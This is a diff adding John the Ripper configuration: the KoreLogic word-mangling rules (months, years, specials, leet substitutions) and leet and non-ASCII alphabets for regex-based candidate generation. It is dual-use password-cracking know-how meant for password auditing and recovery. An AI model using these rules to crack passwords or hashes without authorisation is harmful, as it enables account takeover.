+-[:c] a5 Az"\p[mM]ay[0-9][0-9]"
+-[:c] <* Az"\p[jJ]une"
+-[:c] a5 Az"\p[jJ]une[0-9]"
+# There was a typo in Kore's original revision of this rule
+-[:c] a6 Az"\p[jJ]une[0-9][0-9]"
+-[:c] <* Az"\p[jJ]uly"
+-[:c] a5 Az"\p[jJ]uly[0-9]"
+-[:c] a6 Az"\p[jJ]uly[0-9][0-9]"
+-[:c] <* Az"\p[aA]ugust"
+-[:c] Az"\p[aA]ugust[0-9]"
+-[:c] Az"\p[aA]ugust[0-9][0-9]"
+-[:c] <* Az"\p[sS]eptember"
+-[:c] aA Az"\p[sS]eptember[0-9]"
+# There was a typo in Kore's original revision of this rule
+-[:c] aB Az"\p[sS]eptember[0-9][0-9]"
+-[:c] <* Az"\p[oO]ctober"
+-[:c] a8 Az"\p[oO]ctober[0-9]"
+-[:c] a9 Az"\p[oO]ctober[0-9][0-9]"
+-[:c] <* Az"\p[nN]ovember"
+-[:c] a9 Az"\p[nN]ovember[0-9]"
+-[:c] aA Az"\p[nN]ovember[0-9][0-9]"
+-[:c] <* Az"\p[dD]ecember"
+-[:c] a9 Az"\p[dD]ecember[0-9]"
+-[:c] aA Az"\p[dD]ecember[0-9][0-9]"
+
+[List.Rules:AppendMonthCurrentYear]
+-[:c] a7 Az"\p[jJ]an201[0-9]"
+-[:c] a7 Az"\p[fF]eb201[0-9]"
+-[:c] a7 Az"\p[mM]ar201[0-9]"
+-[:c] a7 Az"\p[aA]pr201[0-9]"
+-[:c] a7 Az"\p[mM]ay201[0-9]"
+-[:c] a7 Az"\p[jJ]un201[0-9]"
+-[:c] a7 Az"\p[jJ]ul201[0-9]"
+-[:c] a7 Az"\p[Aa]ug201[0-9]"
+-[:c] a7 Az"\p[sS]ep201[0-9]"
+-[:c] a7 Az"\p[oO]ct201[0-9]"
+-[:c] a7 Az"\p[nN]ov201[0-9]"
+-[:c] a7 Az"\p[Dd]ec201[0-9]"
+
+[List.Rules:ReplaceNumbers2Special]
+a0 /[1-90] s\0\p[!@#$%^&*()]
+a0 /1 /[2-90] s1! s\0\p[@#$%^&*()]
+a0 /2 /[3-90] s2@ s\0\p[#$%^&*()]
+a0 /3 /[4-90] s3# s\0\p[$%^&*()]
+a0 /4 /[5-90] s4$ s\0\p[%^&*()]
+a0 /5 /[6-90] s5% s\0\p[^&*()]
+a0 /6 /[7-90] s6^ s\0\p[&*()]
+a0 /7 /[890] s7& s\0\p[*()]
+a0 /8 /[90] s8* s\0\p[()]
+a0 /9 /0 s9( s0)
+
+[List.Rules:ReplaceNumbers]
+a0 /0 s0[1-9]
+a0 /1 s1[02-9]
+a0 /2 s2[013-9]
+a0 /3 s3[0-24-9]
+a0 /4 s4[0-35-9]
+a0 /5 s5[0-46-9]
+a0 /6 s6[0-57-9]
+a0 /7 s7[0-68-9]
+a0 /8 s8[0-79]
+a0 /9 s9[0-8]
+# 10 lines above can be replaced with just one:
+# /[0-9] s\0[0-9] Q
+# but it's slower (generates, then rejects some duplicates).
+
+# This is a lamer/faster version of --rules:nt
+[List.Rules:ReplaceLettersCaps]
+-c a0 /[a-z] s\0\p[A-Z]
+
+[List.Rules:AddDotCom]
+-[c:] a4 \p[c:] Az".com"
+-[c:] a4 \p[c:] Az".net"
+-[c:] a4 \p[c:] Az".org"
+
+[List.Rules:AppendCap-Num_or_Special-Twice]
+-[c:] a3 \p[c:] Az"[A-Z][0-9][0-9]"
+-[c:] a3 \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+-[c:] a3 \p[c:] Azq[A-Z][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+-[c:] a3 \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendSpecialLowerLower]
+-[c:] a3 \p[c:] AzQ[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][a-z][a-z]Q
+
+[List.Rules:AppendJustSpecials3Times]
+-[c:] a3 \p[c:] Az"[!$@#%.][!$@#%.][!$@#%.]"
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:PrependJustSpecials]
+-[c:] a1 \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append1_AddSpecialEverywhere]
+-[c:] >4 a2 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
+-[c:] >[5-8] a2 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
+
+[List.Rules:PrependNumNum_AppendNumSpecial]
+-[c:] a4 \p[c:] A0"[0-9][0-9]" Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendNum_AddSpecialEverywhere]
+# This should probably use $[02-9] since we try $1 in
+# Append1_AddSpecialEverywhere
+-[c:] >4 a2 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[02-9]
+-[c:] >[5-8] a2 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[02-9]
+
+[List.Rules:AppendNumNum_AddSpecialEverywhere]
+-[c:] >4 a3 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]"
+-[c:] >[5-8] a3 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]"
+
+[List.Rules:AppendNumNumNum_AddSpecialEverywhere]
+-[c:] >4 a4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]"
+-[c:] >[5-8] a4 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]"
+
+[List.Rules:AppendYears_AddSpecialEverywhere]
+-[c:] >4 a5 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]"
+-[c:] >4 a5 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]"
+-[c:] >[5-8] a5 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]"
+-[c:] >[5-8] a5 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]"
+
+# This rule needs work actually --- you have to 'sort -u' its output    rick
+# /a = reject if it doesnt have an 'a'
+# the [:c] does waste some effort - and generate dupes. This is wasteful,
+# but I want to keep it in b/c the original crack/JtR rules use it.
+[List.Rules:L33t]
+-[:c] a0 /\r[aaAAbBeEiiiIIIllll] s\0\r\p[@44@88331!|1!|17|!] \p1[:M] \p1[:c] \p1[:Q]
+# The following line differs from Kore's erroneous 4 lines:
+-[:c] a0 /\r[LLLL] s\0\r\p[17|!] \p1[:M] \p1[:c] \p1[:Q]
+#/Lsl1[:c]
+#/Lsl7[:c]
+#/Lsl|[:c]
+#/Lsl![:c]
+-[:c] a0 /\r[oOssSStT1111003344557788] s\0\r\p[00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Full set (same as above, but on one line):
+#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Double substitutions start here.
+# Compared to Kore's, we check for both chars first, then replace both.
+# This produces different results from Kore's, which would replace all
+# instances of the first char before checking for the second.
+# Kore's behavior may be restored by moving "sa[@4]" to be right after "/a"
+# on the line below, and ditto for further lines.
+-[:c] a0 /a /\r[AAbBeEiiiIIIllllLLLLoOssSStT111100334@557788] sa[@4] s\2\r\p2[4@88331!|1!|17|!17|!00$5$5++!iI|oOeE@4sSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore had these (probably unintentionally, so we don't duplicate them):
+#/asa4/4s4a[:c]
+#/asa4/4s4A[:c]
+-[:c] a0 /A /\r[aabBeEiiiIIIllllLLLLoOssSStT1111003344557788] sA4 s\0\r\p[@488331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore also had these, but (intentionally?) missed sb8 on this set (after sA4)
+#/AsA4/4s4a[:c]
+#/AsA4/4s4A[:c]
+-[:c] a0 /b /\r[aaAABeEiiiIIIllllLLLLoOssSStT1111003344557788] sb8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /B /\r[aaAAbeEiiiIIIllllLLLLoOssSStT1111003344557788] sB8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /e /\r[aaAAbBEiiiIIIllllLLLLoOssSStT1111003344557788] se3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /E /\r[aaAAbBeiiiIIIllllLLLLoOssSStT1111003344557788] sE3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /i /\r[aaAAbBeEIIIllllLLLLoOssSStT1111003344557788] si[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /I /\r[aaAAbBeEiiillllLLLLoOssSStT1111003344557788] sI[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore's rules only included sl[17|], but not sl!
+-[:c] a0 /l /\r[aaAAbBeEiiiIIILLLLoOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# All "/L" rules (171 lines) were buggy
+-[:c] a0 /L /\r[aaAAbBeEiiiIIIlllloOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /o /\r[aaAAbBeEiiiIIIllllLLLLOssSStT1111003344557788] so0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /O /\r[aaAAbBeEiiiIIIllllLLLLossSStT1111003344557788] sO0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /s /\r[aaAAbBeEiiiIIIllllLLLLoOSStT1111003344557788] ss[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /S /\r[aaAAbBeEiiiIIIllllLLLLoOsstT1111003344557788] sS[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /t /\r[aaAAbBeEiiiIIIllllLLLLoOssSST1111003344557788] st+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /T /\r[aaAAbBeEiiiIIIllllLLLLoOssSSt1111003344557788] sT+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# are these 100% redundant from above rules? !!!!
+-[:c] a0 /1 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT003344557788] s1[!iI|] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /0 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11113344557788] s0[oO] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|eEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /3 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110044557788] s3[eE] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /4 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033557788] s4[aA] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /5 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033447788] s5[sS] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /7 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445588] s7[lL] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /8 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445577] s8[bB] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlL] \p1[:M] \p1[:c] \p1[:Q]
+# These are some popular triple/quad l33t rules
+-[:c] a0 /a /e /[los] sa4 se3 s\0\p[10$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /[ae] /l /[os] s\2\p2[43] sl1 s\3\p3[0$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /[ae] /o /s s\2\p2[43] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /l /o /s sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /[el] /o /s sa4 s\0\p[31] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /e /l /o /s se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /e /l /o /s sa4 se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+
+[List.Rules:ReplaceSpecial2Special]
+# Kore's rules were missing "*"
+# Kore's rules were missing ?[]{}`~
+# Now converted into just a SINGLE rule (well 2 since ? must use class syntax)
+#    The rules do add a Q to avoid no-op, but it is now 2 'working' rules
+#    NOTE, there were numerous rules which also had problems, which were fixed
+#    (in commented out rules), and are 'right' in the 2 new replacement rules.
+# Now thru some pre-processor jiu jitsu, this was reduced to a single rule line
+a0 /[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~?]\p\r[:::::::::::::::::::::::::::::::?] \p\r[:::::::::::::::::::::::::::::::s]\p\r[sssssssssssssssssssssssssssssss?]\1[!@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~] Q
+#these 2 are replaced by the equivalent above 1 rule.
+# /[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~] s\0[!@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~] Q
+# /?? s??[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~]
+#these are replaced by the equivalent above 2 rule lines.
+# /! s![@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~]
+# /@ s@[!#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~]
+#others replacing #$%^&*()-=_+\|;:'",./?><[]{}`~ cut out, and not shown.
+
+[List.Rules:ReplaceLetters]
+a0 /[a-z] s\0[a-z] Q
+-c a0 /[a-z] s\0[A-Z]
+
+####################################################################
+# This ruleset contains ALL of the above, for a total
+# of 7,074,074 rules after dupe removal
+[List.Rules:KoreLogic]
+.include [List.Rules:PrependNumNum]
+.include [List.Rules:PrependYears]
+.include [List.Rules:AppendYears]
+.include [List.Rules:PrependNumNumNum]
+.include [List.Rules:MonthsFullPreface]
+.include [List.Rules:Prepend4LetterMonths]
+.include [List.Rules:PrependSeason]
+.include [List.Rules:AppendSeason]
+.include [List.Rules:PrependHello]
+.include [List.Rules:AppendCurrentYearSpecial]
+.include [List.Rules:PrependSpecialSpecial]
+.include [List.Rules:Append2Letters]
+.include [List.Rules:AddJustNumbers]
+.include [List.Rules:DevProdTestUAT]
+.include [List.Rules:PrependAndAppendSpecial]
+.include [List.Rules:AppendJustNumbers]
+# This is split for better order:
+# First part of AppendNumbers_and_Specials_Simple
+-[c:] a1 \p[c:] $[0-9]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+-[c:] a2 \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+.include [List.Rules:AppendJustSpecials]
+.include [List.Rules:AddShortMonthsEverywhere]
+.include [List.Rules:Add2010Everywhere]
+.include [List.Rules:Add1234_Everywhere]
+.include [List.Rules:AppendMonthDay]
+.include [List.Rules:AppendMonthCurrentYear]
+.include [List.Rules:ReplaceNumbers2Special]
+.include [List.Rules:ReplaceNumbers]
+.include [List.Rules:ReplaceLettersCaps]
+.include [List.Rules:AddDotCom]
+.include [List.Rules:PrependJustSpecials]
+.include [List.Rules:Append1_AddSpecialEverywhere]
+.include [List.Rules:AppendNum_AddSpecialEverywhere]
+.include [List.Rules:AppendNumNum_AddSpecialEverywhere]
+.include [List.Rules:AppendNumNumNum_AddSpecialEverywhere]
+.include [List.Rules:AppendYears_AddSpecialEverywhere]
+.include [List.Rules:L33t]
+.include [List.Rules:ReplaceSpecial2Special]
+.include [List.Rules:ReplaceLetters]
+.include [List.Rules:AppendSpecialNumberNumber]
+.include [List.Rules:PrependNumNumAppendSpecial]
+.include [List.Rules:PrependNumNumSpecial]
+.include [List.Rules:Append2NumSpecial]
+.include [List.Rules:PrependDaysWeek]
+# Second part of AppendNumbers_and_Specials_Simple
+-[c:] a3 \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+.include [List.Rules:PrependSpecialSpecialAppendNumber]
+.include [List.Rules:Append4Num]
+.include [List.Rules:PrependNumNumNumNum]
+.include [List.Rules:Prepend2NumbersAppend2Numbers]
+.include [List.Rules:PrependCAPCAPAppendSpecial]
+.include [List.Rules:AppendSpecialLowerLower]
+# Last part of AppendNumbers_and_Specials_Simple
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+.include [List.Rules:AppendSpecial3num]
+.include [List.Rules:AppendSpecialNumberNumberNumber]
+.include [List.Rules:Append3NumSpecial]
+.include [List.Rules:PrependNumNum_AppendNumSpecial]
+.include [List.Rules:AppendJustSpecials3Times]
+.include [List.Rules:AppendCap-Num_or_Special-Twice]
+.include [List.Rules:PrependSpecialSpecialAppendNumbersNumber]
+.include [List.Rules:Append5Num]
+.include [List.Rules:AppendSpecial4num]
+.include [List.Rules:Prepend4NumAppendSpecial]
+.include [List.Rules:Append4NumSpecial]
+.include [List.Rules:PrependSpecialSpecialAppendNumbersNumberNumber]
+.include [List.Rules:Append6Num]
@@ -0,0 +1,375 @@
+# regex_alphabets.conf
+#
+#  This is the multiple alphabest usable by rexgen function.
+
+# this is the 'default'
+[List.Rexgen.Alpha]
+
+# can also use -i mode rexgen (TBD)
+[List.Rexgen.Alpha:cased]
+a=[aA]
+b=[bB]
+c=[cC]
+d=[dD]
+e=[eE]
+f=[fF]
+g=[gG]
+h=[hH]
+i=[iI]
+j=[jJ]
+k=[kK]
+l=[lL]
+m=[mM]
+n=[nN]
+o=[oO]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS]
+t=[tT]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA]
+B=[bB]
+C=[cC]
+D=[dD]
+E=[eE]
+F=[fF]
+G=[gG]
+H=[hH]
+I=[iI]
+J=[jJ]
+K=[kK]
+L=[lL]
+M=[mM]
+N=[nN]
+O=[oO]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS]
+T=[tT]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# simple 1337 mode.  ONLY leet's lower case letters, and smallish alphabet. But VERY fast.
+[List.Rexgen.Alpha:leet]
+a=[a4@]
+b=[b8]
+e=[e3]
+g=[g9]
+i=[i!]
+l=[l17]
+o=[o0]
+s=[s$5]
+t=[t+7]
+
+# simple 1337 mode with mixed case
+[List.Rexgen.Alpha:leet+c]
+a=[aA4@]
+b=[bB8]
+c=[cC]
+d=[dD]
+e=[eE3]
+f=[fF]
+g=[gG9]
+h=[hH]
+i=[iI!]
+j=[jJ]
+k=[kK]
+l=[lL1]
+m=[mM]
+n=[nN]
+o=[oO0]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS$5]
+t=[tT+7]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA]
+B=[bB]
+C=[cC]
+D=[dD]
+E=[eE]
+F=[fF]
+G=[gG]
+H=[hH]
+I=[iI]
+J=[jJ]
+K=[kK]
+L=[lL]
+M=[mM]
+N=[nN]
+O=[oO]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS]
+T=[tT]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# much stronger 1337 mode.  Does much larger alphabet.  Includes a couple multiple
+# character replacement values: f -> ph and f -> |=  Also does upper case
+# note contains ALL values from Rexgen.Alpha:leet
+[List.Rexgen.Alpha:leet2]
+a=[a4@]
+b=[b8]
+c=[c\(<k]
+e=[e3]
+f=(f|ph|\|=)
+g=[g9]
+i=[i1!\|]
+l=[l1]
+o=[o0]
+s=[s$5]
+t=[t+7]
+A=[A4@]
+B=[B8]
+C=[C\(<k]
+E=[E3]
+F=(F|Ph|PH|\|=)
+G=[G9]
+I=[I1!\|]
+L=[L1]
+O=[O0]
+S=[S$5]
+T=[T+7]
+
+# stronger elete, with mixed case.
+[List.Rexgen.Alpha:leet2_case]
+a=[aA4@]
+b=[bB8]
+c=[cC\(]
+d=[dD]
+e=[eE3]
+f=(f|F|ph|Ph|PH|\|=)
+g=[gG9]
+h=[hH]
+i=[iI1!\|]
+j=[jJ]
+k=[kK]
+l=[lL1]
+m=[mM]
+n=[nN]
+o=[oO0]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS$5]
+t=[tT+7]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA4@]
+B=[bB8]
+C=[cC\(]
+D=[dD]
+E=[eE3]
+F=(f|F|Ph|ph|PH|\|=)
+G=[gG9]
+H=[hH]
+I=[iI1!\|]
+J=[jJ]
+K=[kK]
+L=[lL1]
+M=[mM]
+N=[nN]
+O=[oO0]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS$5]
+T=[tT+7]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# Very strong elete.  MANY multi char eletes, AND some other more obsure ones.
+# a LOT of stuff here, BUT runs much much slower, since there are many more optional
+# values to try.
+# note contains ALL values from Rexgen.Alpha:leet2
+[List.Rexgen.Alpha:leet3]
+a=(a|/-\\|4|@)
+b=(b|\|3|\|o|8)
+c=[c\(<KS]
+d=(d|\|\)|o\||\|>|<\|)
+e=[e3]
+f=(f|ph|\|=)
+g=[g\(69]
+h=(h|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+i=(i|1|!|\||\]\[)
+j=(j|_\|)
+k=(k|\|<|/<|\\<|\|\{)
+l=(l|1|\||\|_)
+m=(m|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+n=(n|\|\\\||/\\/|\|\\\\\||/\|/)
+o=(o|0|\(\)|\[\]|\{\})
+p=(p|\|2|\|D)
+q=(q|\(,\)|kw)
+r=(r|\|2|\|Z|\|?)
+s=[s$5]
+t=(t|+|'\]\['|7)
+u=(u|\|_\|)
+v=(v|\|/|\\\||\\/|/)
+w=(w|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+x=(x|><|\}\{)
+y=(y|'/|`/|j)
+z=(z|2|\(\\\))
+A=(A|/-\\|4|@)
+B=(B|\|3|\|o|8)
+C=[C\(<KS]
+D=(D|\|\)|o\||\|>|<\|)
+E=[E3]
+F=(F|Ph|PH|\|=)
+G=[G\(69]
+H=(H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+I=(I|1|!|\||\]\[)
+J=(J|_\|)
+K=(K|\|<|/<|\\<|\|\{)
+L=(L|1|\||\|_)
+M=(M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+N=(N|\|\\\||/\\/|\|\\\\\||/\|/)
+O=(O|0|\(\)|\[\]|\{\})
+P=(P|\|2|\|D)
+Q=(Q|\(,\)|kw)
+R=(R|\|2|\|Z|\|?)
+S=[S$5]
+T=(T|+|'\]\['|7)
+U=(U|\|_\|)
+v=(V|\|/|\\\||\\/|/)
+W=(W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+X=(X|><|\}\{)
+Y=(Y|'/|`/|j)
+Z=(Z|2|\(\\\))
+
+[List.Rexgen.Alpha:leet3_case]
+a=(a|A|/-\\|4|@)
+b=(b|B|\|3|\|o|8)
+c=[cC\(<KS]
+d=(d|D|\|\)|o\||\|>|<\|)
+e=[eE3]
+f=(f|F|ph|Ph|PH|\|=)
+g=[gG\(69]
+h=(h|H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+i=(i|I|1|!|\||\]\[)
+j=(j|J|_\|)
+k=(k|K|\|<|/<|\\<|\|\{)
+l=(l|L|1|\||\|_)
+m=(m|M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+n=(n|N|\|\\\||/\\/|\|\\\\\||/\|/)
+o=(o|O|0|\(\)|\[\]|\{\})
+p=(p|P|\|2|\|D)
+q=(q|Q|\(,\)|kw)
+r=(r|R|\|2|\|Z|\|?)
+s=[sS$5]
+t=(t|T|+|'\]\['|7)
+u=(u|U|\|_\|)
+v=(v|V|\|/|\\\||\\/|/)
+w=(w|W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+x=(x|X|><|\}\{)
+y=(y|Y|'/|`/|j)
+z=(z|Z|2|\(\\\))
+A=(a|A|/-\\|4|@)
+B=(b|B|\|3|\|o|8)
+C=[cC\(<KS]
+D=(d|D|\|\)|o\||\|>|<\|)
+E=[eE3]
+F=(f|F|PH|Ph|ph|\|=)
+G=[gG\(69]
+H=(h|H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+I=(i|I|1|!|\||\]\[)
+J=(j|J|_\|)
+K=(k|K|\|<|/<|\\<|\|\{)
+L=(l|L|1|\||\|_)
+M=(m|M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+N=(n|N|\|\\\||/\\/|\|\\\\\||/\|/)
+O=(o|O|0|\(\)|\[\]|\{\})
+P=(p|P|\|2|\|D)
+Q=(q|Q|\(,\)|kw)
+R=(r|R|\|2|\|Z|\|?)
+S=[sS$5]
+T=(t|T|+|'\]\['|7)
+U=(u|U|\|_\|)
+v=(v|V|\|/|\\\||\\/|/)
+W=(w|W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+X=(x|X|><|\}\{)
+Y=(y|Y|'/|`/|j)
+Z=(z|Z|2|\(\\\))
+
+[List.Rexgen.Alpha:ascii2nonascii]
+A=[ÀÁÂÃÄÅÆĀĂĄǍǞǠǺȀȂȦȺA]
+B=[ƁƂɃʙB]
+C=[ÇĆĈĊČƇȻC]
+D=[ÐĎĐƉƊƋǱǲD]
+E=[ÈÉÊËĒĔĖĘĚƎƏƐȄȆȨɆE]
+F=[ƑF]
+G=[ĜĞĠĢƓǤǦǴɢG]
+H=[ĤĦǶȞʜH]
+I=[ÌÍÎÏĨĪĬĮİƗǏȈȊɪI]
+J=[ĴƖɈJ]
+K=[ĶĸƘǨK]
